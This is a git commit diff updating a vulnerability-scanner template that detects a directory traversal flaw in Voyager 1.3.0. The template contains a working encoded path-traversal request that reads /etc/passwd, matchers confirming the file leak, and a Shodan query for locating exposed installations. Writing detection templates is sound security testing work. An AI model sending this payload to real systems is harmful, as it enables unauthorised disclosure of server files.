Update and rename voyager-path-traversal.yaml to voyager-lfi.yaml

2024-03-31 23:11:43 +05:30 · 2024-03-31 23:11:43 +05:30 · 869bf27a37
parent 380c0e3911
commit 869bf27a37
1 changed files with 17 additions and 11 deletions
--- a/http/vulnerabilities/other/voyager-path-traversal.yaml
+++ b/http/vulnerabilities/other/voyager-path-traversal.yaml
@ -1,33 +1,39 @@
-id: voyager-path-traversal
+id: voyager-lfi

 info:
-  name: voyager_directory_traversal
+  name: Voyager 1.3.0 - Directory Traversal
  author: mammad_rahimzada
  severity: high
-  description: voyager 1.3.0 is vulnerable to local file inclusion.
+  description: |
+    Voyager 1.3.0 is vulnerable to local file inclusion.
  reference:
-   https://www.exploit-db.com/exploits/47875
+    - https://www.exploit-db.com/exploits/47875
  classification:
    cvss-score: 7.5
    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: html:"voyager-assets"
  tags: voyager,lfi

-requests:
+http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd"

-    stop-at-first-match: true
    matchers-condition: and
    matchers:
-
      - type: regex
+        part: body
        regex:
          - "root:.*:0:0:"
-        part: body
-        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"

      - type: status
        status:
          - 200
-